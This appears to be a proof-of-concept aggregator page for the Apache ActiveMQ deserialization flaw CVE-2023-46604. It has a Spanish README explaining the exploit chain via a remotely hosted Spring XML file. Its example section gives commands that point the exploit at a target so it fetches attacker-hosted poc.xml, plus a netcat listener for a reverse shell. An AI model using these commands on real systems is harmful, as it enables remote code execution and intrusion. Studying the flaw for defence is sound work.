POC详情: 7c8ef2dd1a90dbc008903fa8242797dd64ddb609

来源
关联漏洞
标题: Apache ActiveMQ 代码问题漏洞 (CVE-2023-46604)
描述:Apache ActiveMQ是美国阿帕奇(Apache)基金会的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。 Apache ActiveMQ 5.15.16之前、5.16.7之前、5.17.6之前或5.18.3之前版本存在代码问题漏洞,该漏洞源于允许具有代理网络访问权限的远程攻击者通过操纵 OpenWire 协议中的序列化类类型来运行任意 shell 命令。
描述
El script explota una vulnerabilidad de deserialización insegura en Apache ActiveMQ (CVE-2023-46604) 
介绍
Resumen Técnico del Ataque: CVE-2023-46604

El script explota una vulnerabilidad de deserialización insegura en Apache ActiveMQ (CVE-2023-46604) para lograr la ejecución remota de código en el servidor objetivo.
Descripción del Proceso de Explotación

    Objetivo de la Vulnerabilidad:
        La vulnerabilidad reside en el protocolo OpenWire de Apache ActiveMQ.
        Permite la deserialización insegura de objetos, lo que puede ser aprovechado para ejecutar código arbitrario en el servidor.

    Requisitos Previos:
        Acceso de red al servidor ActiveMQ.
        Un archivo XML malicioso (poc.xml) disponible a través de una URL accesible por el servidor objetivo.

    Componentes del Ataque:
        Script Python: Automatiza el envío del payload malicioso al servidor ActiveMQ.
        Archivo XML (poc.xml): Contiene un bean de Spring que define la ejecución de un comando malicioso (por ejemplo, abrir una shell inversa).

Pasos del Ataque

    Preparación del Payload:
        El script construye un mensaje en hexadecimal que incluye:
            El nombre de la clase Java: org.springframework.context.support.ClassPathXmlApplicationContext.
            La URL del archivo XML malicioso.
        El payload se convierte en una secuencia de bytes que puede ser enviada a través del protocolo OpenWire.

    Envío del Payload:
        El script abre una conexión de socket TCP al servidor ActiveMQ en el puerto especificado (por defecto 61616).
        Envía el payload malicioso al servidor.

    Ejecución del Código Malicioso:
        El servidor ActiveMQ deserializa el objeto especificado en el payload.
        Debido a la deserialización insegura, se carga y ejecuta el bean de Spring definido en el archivo XML.
        Este bean ejecuta un comando malicioso (por ejemplo, una shell inversa) en el servidor.

        _________________________________________________________
ejemplo de ejecucion:
- ***python3 CVE-2023-46604.py -i 10.10.11.243 -u http://10.10.16.2/poc.xml***

- **nc -lvnp 9001**



este script fue copiado y modificado en español:https://github.com/evkl1d/CVE-2023-46604.git
文件快照

[4.0K] /data/pocs/7c8ef2dd1a90dbc008903fa8242797dd64ddb609 ├── [1.8K] CVE-2023-46604.py ├── [ 665] poc.xml └── [2.1K] README.md 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。